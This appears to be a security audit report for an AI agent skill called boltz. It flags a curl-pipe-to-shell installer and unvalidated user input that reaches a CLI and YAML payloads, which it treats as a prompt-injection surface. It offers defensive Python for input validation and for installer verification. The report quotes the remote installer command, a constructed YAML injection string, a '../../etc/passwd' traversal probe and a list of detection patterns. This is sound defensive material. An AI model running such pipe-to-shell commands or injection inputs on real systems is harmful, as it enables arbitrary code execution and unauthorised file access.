boltz
Fail
Audited by Gen Agent Trust Hub on Jun 23, 2026
Risk Level: HIGH
Findings: EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The SKILL.md file provides the installation command curl -fsSL https://install.boltz.bio/boltz-api/install.sh | sh, which downloads a shell script from a remote server and executes it immediately with the privileges of the invoking shell. Nothing is checked before execution (no checksum, no signature, no review of the script contents), so whatever install.boltz.bio serves at that moment runs as arbitrary code on the host.
- [EXTERNAL_DOWNLOADS]: The skill downloads the boltz-api CLI installer from https://install.boltz.bio, an external source that is not part of the primary trusted registries.
- [COMMAND_EXECUTION]: The skill runs the boltz-api CLI and a bundled shell script, scripts/persist.sh. Both receive arguments such as run names and file paths derived from user-provided input; if those values are not validated, they can be crafted to change what the commands do.
- [PROMPT_INJECTION]: The skill has an indirect prompt injection surface: it processes untrusted user data to generate YAML payloads for the Boltz API CLI. Ingestion points: user prompts requesting protein or small-molecule structure designs (documented in references/examples.md). Boundary markers: absent from the instructions and prompt templates. Capability inventory: the boltz-api CLI (network operations and file system writes) and scripts/persist.sh (file system operations). Sanitization: no evidence that user-provided content is sanitized or validated before it is interpolated into the payloads the CLI consumes.
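The COMMAND_EXECUTION and PROMPT_INJECTION findings describe the same weakness from two sides: run names and file paths that originate in a user prompt reach a YAML payload and a CLI argument list without validation. The Python below is an added example, not code from the boltz skill or from Boltz. It shows the injection against a template built by string interpolation (a run name that contains a newline becomes a new top-level YAML key) and the allowlist and path-containment checks that close it. The YAML keys (name, input), the boltz-api subcommand and flags in build_cli_argv, the base directory and the sample inputs are assumptions made for illustration.

```python
"""Validate user-derived values before they reach a YAML payload or CLI argv.

Added example; not code from the boltz skill or from Boltz. The YAML keys,
the boltz-api subcommand/flags, the base directory and the sample inputs are
assumptions made for illustration.
"""
import re
from pathlib import Path

# Allowlists: a run name is a short identifier; a path uses plain characters
# only. Both exclude newlines, quotes, spaces and other YAML/shell syntax.
RUN_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
PATH_RE = re.compile(r"[A-Za-z0-9._/-]+")
ALLOWED_SUFFIXES = {".fasta", ".yaml", ".sdf"}   # assumed input types


def build_payload_unsafe(run_name: str, input_path: str) -> str:
    """Template interpolation: whatever the user typed lands in the YAML verbatim."""
    return f"name: {run_name}\ninput: {input_path}\n"


def top_level_keys(yaml_text: str) -> list[str]:
    """Demo helper, not a YAML parser: a column-0 line of the form 'key:' is a
    top-level mapping key. Enough to show a value being promoted to a key."""
    keys = []
    for line in yaml_text.splitlines():
        m = re.match(r"([A-Za-z_][A-Za-z0-9_-]*):", line)
        if m:
            keys.append(m.group(1))
    return keys


def validate_run_name(run_name: str) -> str:
    if not RUN_NAME_RE.fullmatch(run_name):
        raise ValueError(f"run name rejected: {run_name!r}")
    return run_name


def validate_input_path(input_path: str, base_dir: Path) -> Path:
    """Accept only a path that stays inside base_dir after resolving '..' and
    symlinks, and only for an expected file type."""
    if not PATH_RE.fullmatch(input_path):
        raise ValueError(f"path contains disallowed characters: {input_path!r}")
    base = base_dir.resolve()
    candidate = (base / input_path).resolve()   # an absolute input_path replaces base here
    if base not in candidate.parents:
        raise ValueError(f"path escapes {base}: {input_path!r}")
    if candidate.suffix not in ALLOWED_SUFFIXES:
        raise ValueError(f"unexpected file type: {candidate.suffix!r}")
    return candidate


def build_payload_safe(run_name: str, input_path: str, base_dir: Path) -> str:
    name = validate_run_name(run_name)
    path = validate_input_path(input_path, base_dir)
    # Quote the scalars as well: the allowlists already exclude quotes and
    # newlines, so the quoted form cannot be broken out of.
    return f'name: "{name}"\ninput: "{path}"\n'


def build_cli_argv(run_name: str, input_path: str, base_dir: Path) -> list[str]:
    """Hypothetical boltz-api invocation. Return an argv list for
    subprocess.run(..., shell=False) so values are arguments, never shell text."""
    name = validate_run_name(run_name)
    path = validate_input_path(input_path, base_dir)
    return ["boltz-api", "run", "--name", name, "--input", str(path)]


if __name__ == "__main__":
    base = Path("/srv/boltz-inputs")                # assumed job directory
    hostile = "demo\nscript: scripts/persist.sh"    # constructed injection attempt
    print(top_level_keys(build_payload_unsafe(hostile, "seq.fasta")))
    for fn, args in ((build_payload_safe, (hostile, "seq.fasta", base)),
                     (build_cli_argv, ("demo", "../../etc/passwd", base))):
        try:
            fn(*args)
        except ValueError as exc:
            print("rejected:", exc)
    print(build_cli_argv("demo", "jobs/seq.fasta", base))
```

The containment check rejects both absolute paths and "../" traversal because resolve() is applied after joining, and the character allowlist runs first so that quotes or newlines never reach the YAML even in the quoted form.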
Recommendations
- HIGH: Downloads and executes remote code from https://install.boltz.bio/boltz-api/install.sh. DO NOT USE without thorough review.
- AI detected serious security threats.
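The HIGH recommendation is to review the installer before it runs. One way to turn that into a repeatable procedure, as an added example that is not the skill's own installation method and not Boltz code: fetch the script to disk instead of piping it into sh, compare it to a SHA-256 digest obtained out of band, triage it for the lines a reviewer should read first, and only execute the copy that was hashed. EXPECTED_SHA256 is a placeholder and the triage patterns, the injectable fetch/run hooks and the sample script bytes are assumptions; the real digest must come from a channel you already trust, never from the same host that serves the script.

```python
"""Download-then-verify replacement for `curl ... | sh`.

Added example; not the boltz skill's own installer flow and not Boltz code.
EXPECTED_SHA256 is a placeholder: take the real value from a trusted channel
(signed release notes, a checksum file you already trust), never from the
same URL that serves the script.
"""
import hashlib
import hmac
import re
import subprocess
import tempfile
import urllib.request
from pathlib import Path

INSTALL_URL = "https://install.boltz.bio/boltz-api/install.sh"   # from SKILL.md
EXPECTED_SHA256 = "0" * 64                                        # placeholder

# Lines a reviewer should read first: nested downloads piped into a shell,
# privilege escalation, obfuscated payloads, persistence hooks. Assumed list.
REVIEW_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "nested pipe-to-shell"),
    (re.compile(r"\bsudo\b"), "privilege escalation"),
    (re.compile(r"\beval\b"), "eval"),
    (re.compile(r"base64\s+(-d|--decode)"), "decoded payload"),
    (re.compile(r"(\.bashrc|\.profile|\.zshrc|crontab|systemd)"), "persistence"),
]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def digest_matches(data: bytes, expected_hex: str) -> bool:
    return hmac.compare_digest(sha256_hex(data), expected_hex.lower())


def review_hints(script: bytes) -> list[tuple[int, str, str]]:
    """Return (line number, reason, line) for every line matching a pattern.
    This is triage for the human reviewer, not a substitute for reading it."""
    hits = []
    for n, line in enumerate(script.decode("utf-8", "replace").splitlines(), 1):
        for pattern, reason in REVIEW_PATTERNS:
            if pattern.search(line):
                hits.append((n, reason, line.strip()))
                break
    return hits


def fetch(url: str) -> bytes:
    with urllib.request.urlopen(url, timeout=30) as resp:
        return resp.read()


def run_script(path: Path) -> None:
    subprocess.run(["sh", str(path)], check=True)


def install_verified(url=INSTALL_URL, expected_hex=EXPECTED_SHA256,
                     fetch=fetch, run=run_script) -> Path:
    """Fetch, pin, save, then run. fetch/run are injectable so the flow can be
    exercised offline; both default to the real network and shell."""
    data = fetch(url)
    if not digest_matches(data, expected_hex):
        raise RuntimeError(f"{url}: sha256 {sha256_hex(data)} != pinned {expected_hex}")
    with tempfile.NamedTemporaryFile("wb", suffix=".sh", delete=False) as f:
        f.write(data)
        saved = Path(f.name)
    run(saved)   # the bytes that were hashed are the bytes that execute
    return saved


if __name__ == "__main__":
    # Constructed sample, not the real installer.
    sample = (b"#!/bin/sh\nset -e\n"
              b"curl -fsSL https://example.invalid/x.sh | sh\n"
              b"sudo cp boltz-api /usr/local/bin/\n")
    for n, reason, line in review_hints(sample):
        print(f"line {n} [{reason}]: {line}")
    print("digest to pin after review:", sha256_hex(sample))
```

The intended workflow is: fetch once, read the script (review_hints points at the lines that matter most), pin its digest, and from then on let install_verified refuse anything that differs from what was reviewed. Pinning protects against a later change on the server; it does not make the reviewed script itself trustworthy, which is why the review step comes first.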
Audit Metadata